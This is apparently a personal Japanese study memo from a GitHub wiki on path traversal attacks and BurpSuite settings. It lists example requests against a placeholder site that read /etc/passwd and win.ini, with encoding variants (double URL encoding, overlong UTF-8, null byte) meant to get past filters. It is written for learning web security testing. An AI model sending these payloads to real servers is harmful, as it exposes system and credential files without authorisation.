BurpSuite_file path traversal - meruneru/tech_memo GitHub Wiki

概要

URLやGETコマンドを細工して、サーバ内の情報を奪取する手法。


https://insecure-website.com/loadImage?filename=../../../etc/passwd
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

下記のように色々なバリエーションがある。 Burpsuite proの機能でファジングで自動解析することができるようだが、 community editionは手作業で探す必要がある。

GET /image?filename=/etc/passwd HTTP/1.1
GET /image?filename=../../../etc/passwd HTTP/1.1
GET /image?filename=....//....//....//etc/passwd HTTP/1.1
GET /image?filename=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1
GET /image?filename=..%c0%af..%c0%af..%c0%afetc/passwd HTTP/1.1
GET /image?filename=..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd HTTP/1.1
GET /image?filename=/var/www/images/../../../etc/passwd HTTP/1.1
GET /image?filename=../../../etc/passwd%00.png HTTP/1.1

Burpsuiteの設定

youtubeの解説動画を見ると、Proxy-Options-Intercept Server Responsesの"Intercerpt responses based on the following rules"にチェックを入れていた。

これをする、Response内のContent typeによってInterceptできるようになるみたい。(textのレスポンスを改変する際に使うのか?)

!Pasted image 20220503100016.png

⚠️ **GitHub.com Fallback** ⚠️